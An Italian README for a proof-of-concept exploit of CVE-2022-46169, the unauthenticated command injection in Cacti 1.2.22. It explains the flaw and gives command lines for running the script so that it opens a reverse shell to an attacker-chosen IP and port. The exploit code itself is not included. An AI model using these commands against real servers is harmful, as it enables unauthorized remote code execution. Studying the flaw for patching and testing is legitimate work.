
PoC per CVE-2022-46169 che interessa la versione Cacti 1.2.22
Questo è uno script Proof of Concept (POC) per la vulnerabilità CVE-2022-46169 che interessa Cacti versione 1.2.22.
La vulnerabilità CVE-2022-46169 consente un'iniezione di comandi non autenticata nelle versioni di Cacti fino alla 1.2.22, al fine di ottenere l'esecuzione remota di codice non autenticata come utente www-data. La vulnerabilità è causata da una convalida impropria dell'input utente nel parametro "host_id" del file "remote_agent.php".
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
Sostituisci <TARGET_URL> con l'URL dell'installazione Cacti target, <YOUR_IP> con l'indirizzo IP della macchina su cui vuoi ricevere la reverse shell e <YOUR_PORT> con il numero di porta su cui vuoi ricevere la reverse shell.
Esempio:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
Questo script POC è solo a scopo educativo. Usalo a tuo rischio. L'autore di questo script non è responsabile per eventuali danni causati dall'uso di questo script. Riferimenti
CVE-2022-46169 - Voce CVE per la vulnerabilità.
Avvisi di sicurezza Cacti su GitHub